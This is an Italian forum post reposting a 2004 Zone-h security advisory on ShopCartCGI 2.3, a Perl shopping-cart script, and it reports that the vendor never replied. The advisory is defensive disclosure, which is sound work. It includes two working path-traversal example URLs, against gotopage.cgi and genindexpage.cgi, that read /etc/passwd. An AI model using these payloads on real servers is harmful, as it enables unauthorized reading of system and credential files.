Torna indietro   Serverplan Forum > Serverplan comunica > Vulnerabilità
ShopCartCGI v2.3 lettura remota di file arbitrari ShopCartCGI v2.3 lettura remota di file arbitrari
Registrazione FAQ Lista utenti Calendario Cerca I messaggi di oggi Segna forums come letti

Rispondi
 
LinkBack Strumenti discussione Modalità visualizzazione
  #1 (permalink)  
Vecchio 12-06-2007, 01.56.32
Member
  
Data registrazione: 28-05-2007
Messaggi: 32
Ikarosavenger_79 is on a distinguished road
Predefinito ShopCartCGI v2.3 lettura remota di file arbitrari
ZH2004-06SA (security advisory) ShopCartCGI v2.3 lettura remota di file arbitrari

Pubblicato 17 febbraio 2004



Rilasciato 17 febbraio 2004



Nome ShopCartCGI



Software vulnerabili versione corrente



Titolo Lettura remota di file arbitrari



Author G00db0y from Zone-h Security Labs - g00db0y@zone-h.org - zetalabs@zone-h.org



Vendor //ggmate



Descrizione



***********



Zone-h Security Team ha scoperto due falle di sicurezza in ShopCartCGI 2.3. Esistono due vulnerabilit? nella versione corrente di ShopCartCGI che permettono ad un malintenzionato di accedere a qualsiasi file sul webserver con i suoi privilegi. "The ShopCart CGI is a set of scripts written in Perl to make it easy for you to design and maintain your own WEB Shopping Cart system. The major advantages of this software is that you design your WEB pages based on a simple template. The template provides the mechanisms of form data entry using CGI."



Dettagli



********



E' possibile per un malintenzionato accedere a qualsiasi file sul webserver.



Per esempio



//address/directory/gotopage.cgi?13686+/../../../../../../../../../../../../../../../../etc/passwd



//address/directory/genindexpage.cgi?13687+Home+/../../../../../../../../../../../../../../../../etc/passwd



Soluzione



*********



Il produttore ? stato contattato pi? di 3 settimane fa ma non ? abbiamo ricevuto nessuna risposta.







G00db0y from Zone-h Security Labs - g00db0y@zone-h.org - zetalabs@zone-h.org





Tratto da //zone-h.it/advisories/read/id=270_________________Faq - Contratti - Video Tutorial


Rispondi citando
Rispondi

« Discussione precedente | Prossima discussione »
Strumenti discussione
Modalità visualizzazione
Modalità lineare Modalità lineare

Regole di scrittura
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts
BB code is Attivato
Le faccine sono Attivato
Il codice [IMG] è Attivato
Il codice HTML è Disattivato
Trackbacks are Attivato
Pingbacks are Attivato
Refbacks are Attivato


Discussioni simili
Discussione Autore discussione Forum Risposte Ultimo messaggio
Errore in upload file con file manager NetMassimo Pannello di controllo Cpanel - Linux 2 07-03-2008 10.42.04
ShopCartCGI v2.3 lettura remota di file arbitrari Ikarosavenger_79 Vulnerabilità 0 15-06-2007 21.32.41
Indirizzo di default lettura mail in HORDE dea_informatica Pannello di controllo Cpanel - Linux 1 28-06-2006 17.19.33
Lettura file di log di grandi dimensioni - come fare? Davide2 PHP 4 28-10-2005 11.14.40
ShopCartCGI v2.3 lettura remota di file arbitrari serverplan Vulnerabilità 0 17-02-2004 11.55.11


Tutti gli orari sono GMT +1. Adesso sono le 15.16.40.

Contatta staff - Archivio - Inizio pagina

Powered by vBulletin versione 3.7.3
Copyright ©2000 - 2008, Jelsoft Enterprises Ltd.
Content Relevant URLs by vBSEO 3.1.0
Traduzione italiana : www.vbulletin.it